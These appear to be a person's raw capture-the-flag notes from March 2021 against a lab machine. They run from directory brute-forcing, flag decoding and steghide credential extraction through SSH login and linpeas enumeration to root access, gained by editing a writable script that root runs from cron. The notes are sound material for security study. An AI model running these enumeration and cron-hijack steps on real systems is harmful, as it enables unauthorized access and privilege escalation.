Date:11/mar/2021
Time:18:01
gobuster dir -u http://10.10.186.75 -w /usr/share/wordlists/dirb/common.txt

ZmxhZ3tmMXJzN19mbDRnfQ== view-source:http://10.10.186.75/hidden/whatever/
flag{f1rs7_fl4g} cyberchef

http://10.10.186.75:65524/robots.txt
flag{1m_s3c0nd_fl4g} md5

Fl4g 3 : flag{9fdafbd64c47471a8f54cd3fc64cd312} view-source:http://10.10.186.75:65524/

/n0th1ng3ls3m4tt3r view-source:http://10.10.186.75:65524/

steghide extract -sf  binarycodepixabay.jpg for img http://10.10.186.75:65524/n0th1ng3ls3m4tt3r/
pass:mypasswordforthatjob

cat secrettext.txt                                                    6 ⚙
username:boring
password:
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001
iconvertedmypasswordtobinary got in cyberchef

ssh -p 6498 boring@10.10.186.75
 
boring@kral4-PC:~$ cat user.txt
User Flag But It Seems Wrong Like It`s Rotated Or Something
synt{a0jvgf33zfa0ez4y}
flag{n0wits33msn0rm4l}

─$ scp -P 6498 linpeas.sh boring@10.10.186.75:/home/boring

boring@kral4-PC:~$ chmod 777 linpeas.sh
boring@kral4-PC:~$ ls
linpeas.sh  user.txt
boring@kral4-PC:~$  ./linpeas.sh


boring@kral4-PC:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* *    * * *   root    cd /var/www/ && sudo bash .mysecretcronjob.sh

boring@kral4-PC:~$ cd /var/www/
boring@kral4-PC:/var/www$ ls
html
boring@kral4-PC:/var/www$ ls -la
total 16
drwxr-xr-x  3 root   root   4096 Jun 15  2020 .
drwxr-xr-x 14 root   root   4096 Jun 13  2020 ..
drwxr-xr-x  4 root   root   4096 Jun 15  2020 html
-rwxr-xr-x  1 boring boring   33 Jun 14  2020 .mysecretcronjob.sh
boring@kral4-PC:/var/www$ nano .mysecretcronjob.sh 
boring@kral4-PC:/var/www$ cat .mysecretcronjob.sh 
#!/bin/bash
sudo ls -la /root > /hoem/boring.yo.txt
# i will run as root
boring@kral4-PC:/var/www$ cd /home/boring/
boring@kral4-PC:~$ touch yo.txt
boring@kral4-PC:~$ ls
linpeas.sh  user.txt  yo.txt
boring@kral4-PC:~$ nano /var/www/.mysecretcronjob.sh
boring@kral4-PC:~$ cat /var/www/.mysecretcronjob.sh
#!/bin/bash
sudo ls -la /root > /hoem/boring/yo.txt
# i will run as root
boring@kral4-PC:~$ nano /var/www/.mysecretcronjob.sh
boring@kral4-PC:~$ cat /var/www/.mysecretcronjob.sh
#!/bin/bash
sudo ls -la /root > /home/boring/yo.txt
# i will run as root
boring@kral4-PC:~$ ls
linpeas.sh  user.txt  yo.txt
boring@kral4-PC:~$ cat yo.txt
total 40
drwx------  5 root root 4096 Jun 15  2020 .
drwxr-xr-x 23 root root 4096 Jun 15  2020 ..
-rw-------  1 root root  883 Jun 15  2020 .bash_history
-rw-r--r--  1 root root 3136 Jun 15  2020 .bashrc
drwx------  2 root root 4096 Jun 13  2020 .cache
drwx------  3 root root 4096 Jun 13  2020 .gnupg
drwxr-xr-x  3 root root 4096 Jun 13  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   39 Jun 15  2020 .root.txt
-rw-r--r--  1 root root   66 Jun 14  2020 .selected_editor
boring@kral4-PC:~$ nano /var/www/.mysecretcronjob.sh
boring@kral4-PC:~$ cat .mysecretcronjob.sh
cat: .mysecretcronjob.sh: No such file or directory
boring@kral4-PC:~$ nano /var/www/.mysecretcronjob.sh
boring@kral4-PC:~$ pwd
/home/boring
boring@kral4-PC:~$ ls
linpeas.sh  user.txt  yo.txt
boring@kral4-PC:~$ cat /var/www/.mysecretcronjob.sh
#!/bin/bash
sudo ls -la /root/.root.txt > /home/boring/yo.txt
# i will run as root
boring@kral4-PC:~$ cat yo.txt

root flag
flag{63a9f0ea7bb98050796b649e85481845}
